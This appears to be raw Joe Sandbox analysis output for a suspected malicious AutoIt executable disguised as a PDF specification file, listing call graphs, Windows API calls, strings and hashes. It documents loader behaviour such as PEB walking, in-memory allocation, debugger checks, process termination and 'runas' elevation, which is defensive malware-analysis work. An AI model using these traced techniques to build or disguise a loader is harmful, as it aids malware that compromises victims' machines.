95307->95287 95308->95287 95309->95299 95310 20e295b 95313 20e25d0 95310->95313 95312 20e29a7 95326 20e0000 95313->95326 95316 20e26a0 CreateFileW 95317 20e266f 95316->95317 95319 20e26ad 95316->95319 95318 20e26c9 VirtualAlloc 95317->95318 95317->95319 95324 20e27d0 CloseHandle 95317->95324 95325 20e27e0 VirtualFree 95317->95325 95329 20e34e0 GetPEB 95317->95329 95318->95319 95320 20e26ea ReadFile 95318->95320 95321 20e28bc VirtualFree 95319->95321 95322 20e28ca 95319->95322 95320->95319 95323 20e2708 VirtualAlloc 95320->95323 95321->95322 95322->95312 95323->95317 95323->95319 95324->95317 95325->95317 95331 20e3480 GetPEB 95326->95331 95328 20e068b 95328->95317 95330 20e350a 95329->95330 95330->95316 95332 20e34aa 95331->95332 95332->95328 95333 343742 95334 34374b 95333->95334 95335 3437c6 95334->95335 95336 3437c8 95334->95336 95337 343769 95334->95337 95338 3437ab DefWindowProcW 95335->95338 95339 3437ce 95336->95339 95340 3b1e00 95336->95340 95341 343776 95337->95341 95342 34382c PostQuitMessage 95337->95342 95343 3437b9 95338->95343 95344 3437f6 SetTimer RegisterWindowMessageW 95339->95344 95345 3437d3 95339->95345 95382 342ff6 16 API calls 95340->95382 95347 3b1e88 95341->95347 95348 343781 95341->95348 95342->95343 95344->95343 95353 34381f CreatePopupMenu 95344->95353 95350 3b1da3 95345->95350 95351 3437da KillTimer 95345->95351 95387 384ddd 60 API calls 95347->95387 95354 343836 95348->95354 95355 343789 95348->95355 95360 3b1da8 95350->95360 95361 3b1ddc MoveWindow 95350->95361 95378 343847 Shell_NotifyIconW 95351->95378 95352 3b1e27 95383 35e312 331 API calls 95352->95383 95353->95343 95380 35eb83 53 API calls 95354->95380 95356 343794 95355->95356 95357 3b1e6d 95355->95357 95364 34379f 95356->95364 95365 3b1e58 95356->95365 95357->95338 95386 37a5f3 48 API calls 95357->95386 95358 3b1e9a 95358->95338 95358->95343 95367 3b1dcb SetFocus 95360->95367 95368 3b1dac 95360->95368 95361->95343 95364->95338 95384 343847 Shell_NotifyIconW 95364->95384 95385 3855bd 70 API calls 95365->95385 95366 343845 95366->95343 95367->95343 95368->95364 95370 3b1db5 95368->95370 95369 3437ed 95379 34390f DeleteObject DestroyWindow 95369->95379 95381 342ff6 16 API calls 95370->95381 95376 3b1e4c 95377 344ffc 67 API calls 95376->95377 95377->95335 95378->95369 95379->95343 95380->95366 95381->95343 95382->95352 95383->95364 95384->95376 95385->95366 95386->95335 95387->95358 95388 3b9bec 95392 350ae0 95388->95392 95390 35f4ea 48 API calls 95390->95392 95391 351526 95476 38cc5c 86 API calls 95391->95476 95392->95390 95392->95391 95400 34ffe1 95392->95400 95405 34fec8 95392->95405 95417 34ce19 48 API calls 95392->95417 95422 39e822 331 API calls 95392->95422 95424 34fe30 331 API calls 95392->95424 95425 3ba706 95392->95425 95427 3797ed InterlockedDecrement 95392->95427 95429 396ff0 331 API calls 95392->95429 95430 3a0d09 95392->95430 95433 39f0ac 95392->95433 95465 38a6ef 95392->95465 95473 39ef61 82 API calls 95392->95473 95395 35f4ea 48 API calls 95395->95405 95396 35146e 95406 346eed 48 API calls 95396->95406 95398 350509 95479 38cc5c 86 API calls 95398->95479 95402 351473 95478 38cc5c 86 API calls 95402->95478 95403 3ba246 95408 346eed 48 API calls 95403->95408 95404 3ba922 95405->95395 95405->95396 95405->95398 95405->95400 95405->95402 95405->95403 95411 346eed 48 API calls 95405->95411 95412 3797ed InterlockedDecrement 95405->95412 95414 3ba30e 95405->95414 95415 34d7f7 48 API calls 95405->95415 95416 360f0a 52 API calls 95405->95416 95419 3ba973 95405->95419 95423 3515b5 95405->95423 95471 351820 331 API calls 95405->95471 95472 351d10 59 API calls 95405->95472 95406->95400 95408->95400 95411->95405 95412->95405 95413 3ba873 95414->95400 95474 3797ed InterlockedDecrement 95414->95474 95415->95405 95416->95405 95417->95392 95480 38cc5c 86 API calls 95419->95480 95421 3ba982 95422->95392 95477 38cc5c 86 API calls 95423->95477 95424->95392 95475 38cc5c 86 API calls 95425->95475 95427->95392 95429->95392 95481 39f8ae 95430->95481 95432 3a0d19 95432->95392 95434 34d7f7 48 API calls 95433->95434 95435 39f0c0 95434->95435 95436 34d7f7 48 API calls 95435->95436 95437 39f0c8 95436->95437 95438 34d7f7 48 API calls 95437->95438 95439 39f0d0 95438->95439 95440 34936c 81 API calls 95439->95440 95462 39f0de 95440->95462 95441 346a63 48 API calls 95441->95462 95442 39f2cc 95443 39f2f9 95442->95443 95567 346b68 48 API calls 95442->95567 95443->95392 95444 39f2b3 95446 34518c 48 API calls 95444->95446 95450 39f2c0 95446->95450 95447 34c799 48 API calls 95447->95462 95448 39f2ce 95451 34518c 48 API calls 95448->95451 95449 346eed 48 API calls 95449->95462 95452 34510d 48 API calls 95450->95452 95453 39f2dd 95451->95453 95452->95442 95455 34510d 48 API calls 95453->95455 95454 34bdfa 48 API calls 95457 39f175 CharUpperBuffW 95454->95457 95455->95442 95456 34bdfa 48 API calls 95459 39f23a CharUpperBuffW 95456->95459 95458 34d645 53 API calls 95457->95458 95458->95462 95460 35d922 55 API calls 95459->95460 95460->95462 95461 34936c 81 API calls 95461->95462 95462->95441 95462->95442 95462->95443 95462->95444 95462->95447 95462->95448 95462->95449 95462->95454 95462->95456 95462->95461 95463 34510d 48 API calls 95462->95463 95464 34518c 48 API calls 95462->95464 95463->95462 95464->95462 95466 38a6fb 95465->95466 95467 35f4ea 48 API calls 95466->95467 95468 38a709 95467->95468 95469 38a717 95468->95469 95470 34d7f7 48 API calls 95468->95470 95469->95392 95470->95469 95471->95405 95472->95405 95473->95392 95474->95400 95475->95391 95476->95400 95477->95400 95478->95413 95479->95404 95480->95421 95482 34936c 81 API calls 95481->95482 95483 39f8ea 95482->95483 95506 39f92c 95483->95506 95517 3a0567 95483->95517 95485 39fb8b 95486 39fcfa 95485->95486 95491 39fb95 95485->95491 95553 3a0688 89 API calls 95486->95553 95489 39fd07 95490 39fd13 95489->95490 95489->95491 95490->95506 95530 39f70a 95491->95530 95492 34936c 81 API calls 95502 39f984 95492->95502 95497 39fbc9 95544 35ed18 95497->95544 95500 39fbfd 95504 35c050 48 API calls 95500->95504 95501 39fbe3 95550 38cc5c 86 API calls 95501->95550 95502->95485 95502->95492 95502->95506 95548 3a29e8 48 API calls 95502->95548 95549 39fda5 60 API calls 95502->95549 95507 39fc14 95504->95507 95505 39fbee GetCurrentProcess TerminateProcess 95505->95500 95506->95432 95508 39fc3e 95507->95508 95509 351b90 48 API calls 95507->95509 95510 39fd65 95508->95510 95513 351b90 48 API calls 95508->95513 95552 34dcae 50 API calls 95508->95552 95554 3a040f 105 API calls 95508->95554 95511 39fc2d 95509->95511 95510->95506 95514 39fd7e FreeLibrary 95510->95514 95551 3a040f 105 API calls 95511->95551 95513->95508 95514->95506 95518 34bdfa 48 API calls 95517->95518 95519 3a0582 CharLowerBuffW 95518->95519 95555 381f11 95519->95555 95523 34d7f7 48 API calls 95524 3a05bb 95523->95524 95562 3469e9 48 API calls 95524->95562 95526 3a05d2 95527 34b18b 48 API calls 95526->95527 95529 3a05de 95527->95529 95528 3a061a 95528->95502 95529->95528 95563 39fda5 60 API calls 95529->95563 95531 39f725 95530->95531 95535 39f77a 95530->95535 95532 35f4ea 48 API calls 95531->95532 95534 39f747 95532->95534 95533 35f4ea 48 API calls 95533->95534 95534->95533 95534->95535 95536 3a0828 95535->95536 95537 3a0a53 95536->95537 95543 3a084b 95536->95543 95537->95497 95538 34cf93 58 API calls 95538->95543 95539 34d286 48 API calls 95539->95543 95540 34936c 81 API calls 95540->95543 95541 36395c 47 API calls 95541->95543 95543->95537 95543->95538 95543->95539 95543->95540 95543->95541 95566 388035 50 API calls 95543->95566 95546 35ed2d 95544->95546 95545 35edc5 VirtualAlloc 95547 35ed93 95545->95547 95546->95545 95546->95547 95547->95500 95547->95501 95548->95502 95549->95502 95550->95505 95551->95508 95552->95508 95553->95489 95554->95508 95556 381f3b 95555->95556 95557 381f79 95556->95557 95558 381f6f 95556->95558 95560 381ffa 95556->95560 95557->95523 95557->95529 95558->95557 95564 35d37a 60 API calls 95558->95564 95560->95557 95565 35d37a 60 API calls 95560->95565 95562->95526 95563->95528 95564->95558 95565->95560 95566->95543 95567->95443 95568 3b9c06 95569 35d3be 50 API calls 95568->95569 95570 3b9c1c 95569->95570 95571 3b9c91 95570->95571 95579 341caa 49 API calls 95570->95579 95574 353200 331 API calls 95571->95574 95573 3b9c71 95576 3b9cc5 95573->95576 95580 38b171 48 API calls 95573->95580 95574->95576 95577 3ba7ab 95576->95577 95581 38cc5c 86 API calls 95576->95581 95579->95573 95580->95571 95581->95577 95582 20e23b0 95583 20e0000 GetPEB 95582->95583 95584 20e2459 95583->95584 95596 20e22a0 95584->95596 95597 20e22a9 Sleep 95596->95597 95598 20e22b7 95597->95598

                                      Executed Functions

                                      Function 00343D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                        • Part of subcall function 00346430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343DEE,00401148,?,?,?,?,?,00343AA3,?), ref: 00346471
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F28F4,00000010), ref: 003B1CCE
                                      • SetCurrentDirectoryW.KERNEL32(?,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D06
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003DDAB4,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D89
                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00343AA3), ref: 003B1D90
                                        • Part of subcall function 00343E6E: GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                        • Part of subcall function 00343E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                        • Part of subcall function 00343E6E: LoadIconW.USER32(00000063), ref: 00343E9E
                                        • Part of subcall function 00343E6E: LoadIconW.USER32(000000A4), ref: 00343EB0
                                        • Part of subcall function 00343E6E: LoadIconW.USER32(000000A2), ref: 00343EC2
                                        • Part of subcall function 00343E6E: RegisterClassExW.USER32(?), ref: 00343F30
                                        • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                        • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                        • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                        • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                        • Part of subcall function 00344FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003450CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell_
                                      • String ID: ()?$This is a third-party compiled AutoIt script.$runas
                                      • API String ID: 1889724702-42928549
                                      • Opcode ID: a8be32d4756e3ba6590e373f6dfdbca0deafea173dbc7a4f7d75527bca078f14
                                      • Instruction ID: 13565b8e901344168d4240a5c36d0658e42d12ecdd50616a7a94616abd09a188
                                      • Opcode Fuzzy Hash: a8be32d4756e3ba6590e373f6dfdbca0deafea173dbc7a4f7d75527bca078f14
                                      • Instruction Fuzzy Hash: AF510731E05248ABCF17ABB0DD46EEE7BB99B19704F004079F641BF1A2DB746645CB21
                                      Function 0036B043 Relevance: 18.5, APIs: 12, Instructions: 537COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 389 36b043-36b080 call 36f8a0 392 36b082-36b084 389->392 393 36b089-36b08b 389->393 394 36b860-36b86c call 36a70c 392->394 395 36b0ac-36b0d9 393->395 396 36b08d-36b0a7 call 367bda call 367c0e call 366e10 393->396 399 36b0e0-36b0e7 395->399 400 36b0db-36b0de 395->400 396->394 404 36b105 399->404 405 36b0e9-36b100 call 367bda call 367c0e call 366e10 399->405 400->399 403 36b10b-36b110 400->403 407 36b112-36b11c call 36f82f 403->407 408 36b11f-36b12d call 373bf2 403->408 404->403 434 36b851-36b854 405->434 407->408 420 36b133-36b145 408->420 421 36b44b-36b45d 408->421 420->421 423 36b14b-36b183 call 367a0d GetConsoleMode 420->423 424 36b463-36b473 421->424 425 36b7b8-36b7d5 WriteFile 421->425 423->421 446 36b189-36b18f 423->446 430 36b55a-36b55f 424->430 431 36b479-36b484 424->431 427 36b7d7-36b7df 425->427 428 36b7e1-36b7e7 GetLastError 425->428 435 36b7e9 427->435 428->435 436 36b565-36b56e 430->436 437 36b663-36b66e 430->437 432 36b48a-36b49a 431->432 433 36b81b-36b833 431->433 439 36b4a0-36b4a3 432->439 440 36b835-36b838 433->440 441 36b83e-36b84e call 367c0e call 367bda 433->441 445 36b85e-36b85f 434->445 443 36b7ef-36b7f1 435->443 436->433 444 36b574 436->444 437->433 442 36b674 437->442 449 36b4a5-36b4be 439->449 450 36b4e9-36b520 WriteFile 439->450 440->441 451 36b83a-36b83c 440->451 441->434 452 36b67e-36b693 442->452 454 36b856-36b85c 443->454 455 36b7f3-36b7f5 443->455 456 36b57e-36b595 444->456 445->394 447 36b191-36b193 446->447 448 36b199-36b1bc GetConsoleCP 446->448 447->421 447->448 457 36b1c2-36b1ca 448->457 458 36b440-36b446 448->458 459 36b4c0-36b4ca 449->459 460 36b4cb-36b4e7 449->460 450->428 461 36b526-36b538 450->461 451->445 462 36b699-36b69b 452->462 454->445 455->433 464 36b7f7-36b7fc 455->464 465 36b59b-36b59e 456->465 466 36b1d4-36b1d6 457->466 458->455 459->460 460->439 460->450 461->443 467 36b53e-36b54f 461->467 468 36b69d-36b6b3 462->468 469 36b6d8-36b719 WideCharToMultiByte 462->469 471 36b812-36b819 call 367bed 464->471 472 36b7fe-36b810 call 367c0e call 367bda 464->472 473 36b5a0-36b5b6 465->473 474 36b5de-36b627 WriteFile 465->474 477 36b1dc-36b1fe 466->477 478 36b36b-36b36e 466->478 467->432 479 36b555 467->479 480 36b6c7-36b6d6 468->480 481 36b6b5-36b6c4 468->481 469->428 483 36b71f-36b721 469->483 471->434 472->434 485 36b5cd-36b5dc 473->485 486 36b5b8-36b5ca 473->486 474->428 476 36b62d-36b645 474->476 476->443 488 36b64b-36b658 476->488 489 36b217-36b223 call 361688 477->489 490 36b200-36b215 477->490 491 36b375-36b3a2 478->491 492 36b370-36b373 478->492 479->443 480->462 480->469 481->480 493 36b727-36b75a WriteFile 483->493 485->465 485->474 486->485 488->456 495 36b65e 488->495 512 36b225-36b239 489->512 513 36b269-36b26b 489->513 496 36b271-36b283 call 3740f7 490->496 498 36b3a8-36b3ab 491->498 492->491 492->498 499 36b75c-36b776 493->499 500 36b77a-36b78e GetLastError 493->500 495->443 516 36b435-36b43b 496->516 517 36b289 496->517 507 36b3b2-36b3c5 call 375884 498->507 508 36b3ad-36b3b0 498->508 499->493 503 36b778 499->503 505 36b794-36b796 500->505 503->505 505->435 511 36b798-36b7b0 505->511 507->428 522 36b3cb-36b3d5 507->522 508->507 514 36b407-36b40a 508->514 511->452 518 36b7b6 511->518 520 36b412-36b42d 512->520 521 36b23f-36b254 call 3740f7 512->521 513->496 514->466 519 36b410 514->519 516->435 523 36b28f-36b2c4 WideCharToMultiByte 517->523 518->443 519->516 520->516 521->516 531 36b25a-36b267 521->531 525 36b3d7-36b3ee call 375884 522->525 526 36b3fb-36b401 522->526 523->516 527 36b2ca-36b2f0 WriteFile 523->527 525->428 534 36b3f4-36b3f5 525->534 526->514 527->428 530 36b2f6-36b30e 527->530 530->516 533 36b314-36b31b 530->533 531->523 533->526 535 36b321-36b34c WriteFile 533->535 534->526 535->428 536 36b352-36b359 535->536 536->516 537 36b35f-36b366 536->537 537->526
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                      • Instruction ID: 7058acf73c370e7cb4c884c53df2a085a6a8dd4002b07d1ba3299e69b5699435
                                      • Opcode Fuzzy Hash: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                      • Instruction Fuzzy Hash: 63324D75A022688FCB268F15DC41AE9B7B5FF46310F5980D9E40AE7A89D7309EC1CF52
                                      Function 0035DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1195 35ddc0-35de4f call 34d7f7 GetVersionExW call 346a63 call 35dfb4 call 346571 1204 35de55-35de56 1195->1204 1205 3b24c8-3b24cb 1195->1205 1206 35de92-35dea2 call 35df77 1204->1206 1207 35de58-35de63 1204->1207 1208 3b24cd 1205->1208 1209 3b24e4-3b24e8 1205->1209 1226 35dea4-35dec1 GetCurrentProcess call 35df5f 1206->1226 1227 35dec7-35dee1 1206->1227 1210 3b244e-3b2454 1207->1210 1211 35de69-35de6b 1207->1211 1213 3b24d0 1208->1213 1214 3b24ea-3b24f3 1209->1214 1215 3b24d3-3b24dc 1209->1215 1220 3b245e-3b2464 1210->1220 1221 3b2456-3b2459 1210->1221 1217 3b2469-3b2475 1211->1217 1218 35de71-35de74 1211->1218 1213->1215 1214->1213 1216 3b24f5-3b24f8 1214->1216 1215->1209 1216->1215 1222 3b247f-3b2485 1217->1222 1223 3b2477-3b247a 1217->1223 1224 3b2495-3b2498 1218->1224 1225 35de7a-35de89 1218->1225 1220->1206 1221->1206 1222->1206 1223->1206 1224->1206 1230 3b249e-3b24b3 1224->1230 1231 3b248a-3b2490 1225->1231 1232 35de8f 1225->1232 1226->1227 1247 35dec3 1226->1247 1228 35df31-35df3b GetSystemInfo 1227->1228 1229 35dee3-35def7 call 35e00c 1227->1229 1238 35df0e-35df1a 1228->1238 1242 35df29-35df2f GetSystemInfo 1229->1242 1243 35def9-35df01 call 35dff4 GetNativeSystemInfo 1229->1243 1235 3b24bd-3b24c3 1230->1235 1236 3b24b5-3b24b8 1230->1236 1231->1206 1232->1206 1235->1206 1236->1206 1240 35df21-35df26 1238->1240 1241 35df1c-35df1f FreeLibrary 1238->1241 1241->1240 1246 35df03-35df07 1242->1246 1243->1246 1246->1238 1249 35df09-35df0c FreeLibrary 1246->1249 1247->1227 1249->1238
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0035DDEC
                                      • GetCurrentProcess.KERNEL32(00000000,003DDC38,?,?), ref: 0035DEAC
                                      • GetNativeSystemInfo.KERNELBASE(?,003DDC38,?,?), ref: 0035DF01
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF0C
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF1F
                                      • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF29
                                      • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                      • String ID:
                                      • API String ID: 3851250370-0
                                      • Opcode ID: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                      • Instruction ID: f2624dbde9988210c1dd79d7016d1dac2557d89ea481b78f351486bebbf2be66
                                      • Opcode Fuzzy Hash: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                      • Instruction Fuzzy Hash: 6B61A0B180A284CFCF27CF6898C19EA7FB46F29305B1A49D9DC859F217C624C90DCB65
                                      Function 0034406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1267 34406b-344083 CreateStreamOnHGlobal 1268 344085-34409c FindResourceExW 1267->1268 1269 3440a3-3440a6 1267->1269 1270 3440a2 1268->1270 1271 3b4f16-3b4f25 LoadResource 1268->1271 1270->1269 1271->1270 1272 3b4f2b-3b4f39 SizeofResource 1271->1272 1272->1270 1273 3b4f3f-3b4f4a LockResource 1272->1273 1273->1270 1274 3b4f50-3b4f6e 1273->1274 1274->1270
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0034449E,?,?,00000000,00000001), ref: 0034407B
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0034449E,?,?,00000000,00000001), ref: 00344092
                                      • LoadResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F1A
                                      • SizeofResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F2F
                                      • LockResource.KERNEL32(0034449E,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB,00000000), ref: 003B4F42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                      • Instruction ID: 724adccd68be27bebed513be57a35fd7f9b41c26b0e95862bd61b4e3ff49b0b7
                                      • Opcode Fuzzy Hash: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                      • Instruction Fuzzy Hash: B3112A71200705AFE7228B65EC49F67BBBDEBC5B51F10457CF602DA6A0DA71EC048B20
                                      Function 00353B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$ @$ @$ @
                                      • API String ID: 0-1793783390
                                      • Opcode ID: 5974f890d2d1dc3015db0713c83f69cbe129c50637bd77e497ef9736563e6eec
                                      • Instruction ID: 6205727fc5bacc2c2cb0dd2f2363677ac37c947122b027883deef174b72334d9
                                      • Opcode Fuzzy Hash: 5974f890d2d1dc3015db0713c83f69cbe129c50637bd77e497ef9736563e6eec
                                      • Instruction Fuzzy Hash: D372BC31E042089FCF16DF94C481EAEB7B5EF48345F15806AED09AF6A1D730AE49CB91
                                      Function 00386CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,003B2F49), ref: 00386CB9
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00386CCA
                                      • FindClose.KERNEL32(00000000), ref: 00386CDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                      • Instruction ID: aafa502b2109a5d59645119d7fdf880d607e86928ce1af0a3f3e277ca399108c
                                      • Opcode Fuzzy Hash: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                      • Instruction Fuzzy Hash: EAE048318145155B86517738EC0E8E9777CDA05339F144765F575C11D0E770E94447D5
                                      Function 00353200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
